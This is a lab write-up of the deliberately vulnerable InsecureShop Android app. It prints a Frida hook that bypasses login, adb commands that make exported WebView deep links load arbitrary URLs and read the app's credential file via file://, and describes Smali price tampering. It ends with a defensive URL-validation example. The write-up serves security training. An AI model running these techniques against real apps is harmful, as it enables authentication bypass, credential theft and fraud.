# Insecure Shop Application

#### Table of Contents

1. [Starting the Solution](#id-1-starting-the-solution)
2. [Hardcoded Credentials](#id-2-hardcoded-credentials)
3. [Hooking The Login page](#id-3-hooking-the-login-page)
4. [Insecure Logging](#id-4-insecure-logging)
5. [Deep Link Exploitation using WebView](#id-5-deep-link-exploitation-using-webview)
6. [Deep Link Exploitation using WebView2Activity](#id-6-deep-link-exploitation-using-webview2activity)
7. [Editing on Smali Code](#id-7-editing-on-smali-code)

***

#### 1- Starting the Solution

I first used the application, found the login page, and tested some credentials to see how it reacts. I also tried some SQL payloads, but the response was always the same: "Invalid username and password".

![](https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2Fve8aACc1xaah1bD30n1p%2Fimage.png?alt=media\&token=0f75ae66-f205-4ba1-9e10-97ac75c3ad90)![](https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FByDdKvbjtwpnUkRKVnSI%2Fimage.png?alt=media\&token=9135353b-5096-48d3-ac60-c1621c0ab868)

So I decompiled the app with Jadx-gui, searched for "username", and found a Boolean function called `verifyUserNamePassword()`. This is the function that verifies the username and the password.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FJOI6Y6ut6iqwkAv8iIgs%2Fimage.png?alt=media&#x26;token=aeb96c85-4da1-4e5e-aa32-c3cda2d3def6" alt=""><figcaption></figcaption></figure>

***

#### 2- Hardcoded Credentials

Opening it, I found a `getUserCreds()` function that contains the hardcoded credentials for the login page.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FtpuMfBPHNJ0G396Y9g2z%2Fimage.png?alt=media&#x26;token=2dfe2776-91dd-4a5a-bb84-1f35310a801d" alt=""><figcaption></figcaption></figure>

***

#### 3- Hooking The Login page

Now I can log in. If no hardcoded credentials had been found, there is another way to bypass the login: a `Frida` script that uses the package name (`com.insecureshop.util`), the class name (`Util`), and the required function name (`verifyUserNamePassword()`) that appear in the Util file.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2F9D8m8GNLnbp73T6hQkwy%2Fimage.png?alt=media&#x26;token=de42c445-301f-49ab-9e8e-30f8b6d7ef4d" alt=""><figcaption></figcaption></figure>

This is the script we can use:

```javascript
Java.perform(function () {
    console.log("[*] Hooking InsecureShop Login Bypass");

    // Get a wrapper for the Util class identified in Jadx
    var LoginBypass = Java.use("com.insecureshop.util.Util");
    // Replace the credential check so it reports success for any input
    LoginBypass.verifyUserNamePassword.implementation = function (username, password) {
        return true;
    };

    console.log("[*] Login Bypass Hook Injected Successfully.");
});
```

Save it as `file.js`, run the Frida server on the emulator, and run this command to hook the function:\
`frida -U -l file.js -f <Package_Name>`\
Now I can log in without credentials on the login page.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FRiI07P0RKjFgc8tVDEoz%2Fimage.png?alt=media&#x26;token=3c58f5c5-98be-439f-b409-7d86b34a259d" alt=""><figcaption></figcaption></figure>

#### 4- Insecure Logging

I used the `Logcat` command to check whether the app logs the data, and it logs it to the local file system.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FoYw87ejFKWUASVfTaSU4%2Fimage.png?alt=media&#x26;token=be42e6f3-83c2-4ba8-9540-8c0314893a24" alt=""><figcaption></figcaption></figure>

The file can be read with\
`cat /data/data/com.insecureshop/shared_prefs/Prefs.xml`, and I found the credentials there.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2Fqtw9UJGah9gbbzzeHmsu%2Fimage.png?alt=media&#x26;token=2fbcf532-722a-4020-8fda-c963c6b8c2a8" alt=""><figcaption></figcaption></figure>

***

#### 5- Deep Link Exploitation using WebView

I found `WebViewActivity` here, registered with the host `com.insecureshop` and the scheme `insecureshop`. It is opened for the paths `/web` or `/webview` and takes the parameter `url`, so the final link looks like this:\
`insecureshop://com.insecureshop/web?url=<URL_Link>`

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FmsAhQnuxu9zpoMsQUfKd%2Fimage.png?alt=media&#x26;token=0844400a-8017-4769-a3bc-3e9cec488ea3" alt=""><figcaption></figcaption></figure>

<div align="center"><figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FyX8DhFAat1xSswoBaDI3%2Fimage.png?alt=media&#x26;token=b13841fe-c44d-4d72-ad32-2bc6aaa4af59" alt="" width="355"><figcaption></figcaption></figure></div>

So I can use the ADB Activity Manager like this to open the Google website:

`adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=http://google.com"`

It worked and opened Google in the application's WebView.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FzXDYw3Xuh9mHWo62ri5O%2Fimage.png?alt=media&#x26;token=d460f222-95b2-463c-acb4-f314c88b7962" alt=""><figcaption></figcaption></figure>

I can also access file data using the `file://` scheme like this:\
`adb shell am start -n com.insecureshop/.WebViewActivity -d "insecureshop://com.insecureshop/web?url=file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"`

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2F3Mg6ZIBiyOrS7rtX84h1%2Fimage.png?alt=media&#x26;token=2c6afac9-e3cb-4ee8-befb-5080a6a1d2e2" alt=""><figcaption></figcaption></figure>

***

#### 6- Deep Link Exploitation using WebView2Activity

I found `WebView2Activity` here. It is the same as the previous one but without a host and scheme, so I can open any file and any link without a specific scheme and host:

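```bash
# Run inside `adb shell`; the -d value is passed to the WebView as-is
am start -n com.insecureshop/.WebView2Activity -d "file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"

# The -d value can be either of:
#   file:///data/data/com.insecureshop/shared_prefs/Prefs.xml
#   https://google.com
```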

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FxwtNVrjMAJ4oCDzvM6D5%2Fimage.png?alt=media&#x26;token=6b427deb-90df-42f2-b9dd-a37ffae4679e" alt="" width="563"><figcaption></figcaption></figure>
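
The check that both `WebViewActivity` and `WebView2Activity` are missing, modelled in JavaScript as an added example (not code from the InsecureShop project): the target URL is parsed, only `https` is accepted, and the host must exactly match an allowlist. `ALLOWED_HOSTS`, `shop.example.com`, `checkTarget` and `checkDeepLink` are assumed names; in the app the same logic would run in the activity before the WebView loads anything.

```javascript
// Added example: validation logic for URLs handed to the WebView activities.
// ALLOWED_HOSTS and shop.example.com are assumptions, not values from the app.
const ALLOWED_HOSTS = new Set(["shop.example.com"]);
const DEEP_LINK = {
  scheme: "insecureshop:",
  host: "com.insecureshop",
  paths: ["/web", "/webview"],
};

// Decide whether a URL may be loaded in the WebView (WebView2Activity case:
// the intent data is the target itself).
function checkTarget(raw) {
  let target;
  try {
    target = new URL(raw);
  } catch {
    return { ok: false, reason: "unparseable url" };
  }
  // Rejects file:// and http:// (both used above) and any other scheme.
  if (target.protocol !== "https:") {
    return { ok: false, reason: `scheme ${target.protocol} not allowed` };
  }
  // Exact match on the parsed host; substring or suffix checks are too loose.
  if (!ALLOWED_HOSTS.has(target.hostname)) {
    return { ok: false, reason: `host ${target.hostname} not allowed` };
  }
  return { ok: true, url: target.href };
}

// WebViewActivity case: confirm the deep link shape, then validate its `url`.
function checkDeepLink(intentData) {
  let link;
  try {
    link = new URL(intentData);
  } catch {
    return { ok: false, reason: "unparseable deep link" };
  }
  const shapeOk = link.protocol === DEEP_LINK.scheme &&
    link.hostname === DEEP_LINK.host &&
    DEEP_LINK.paths.includes(link.pathname);
  if (!shapeOk) return { ok: false, reason: "not an insecureshop deep link" };
  const inner = link.searchParams.get("url");
  if (inner === null) return { ok: false, reason: "missing url parameter" };
  return checkTarget(inner);
}
```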

***

#### 7- Editing on Smali Code

I opened the `file.apk` file with the `APKLab` extension in Visual Studio Code, edited the prices stored in the Smali code, and rebuilt the app. I was then able to buy all items at different prices.

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FF776mHEtrqP3Y51eX3cC%2Fimage.png?alt=media&#x26;token=1103bb6b-0a98-40d5-806b-4190a403569d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2Fpz8vRD4pjwXsvskzptTE%2Fimage.png?alt=media&#x26;token=7bbf51a5-5882-4417-8a0f-3cf64e3c281e" alt=""><figcaption></figcaption></figure>

<div align="center"><figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FtHr8U9Qc9bC6nHPA8NKq%2Fimage.png?alt=media&#x26;token=1761bef5-3047-451e-bb99-ebc6e9feb2fc" alt="" width="296"><figcaption></figcaption></figure></div>

<figure><img src="https://1695281020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FiBkNGOCaSbgxYLnHH6RS%2Fuploads%2FWIN2jn4j0c81kFmt1ZpG%2Fimage.png?alt=media&#x26;token=08470cd5-cc94-464f-ac04-64abe7957b13" alt="" width="296"><figcaption></figcaption></figure>
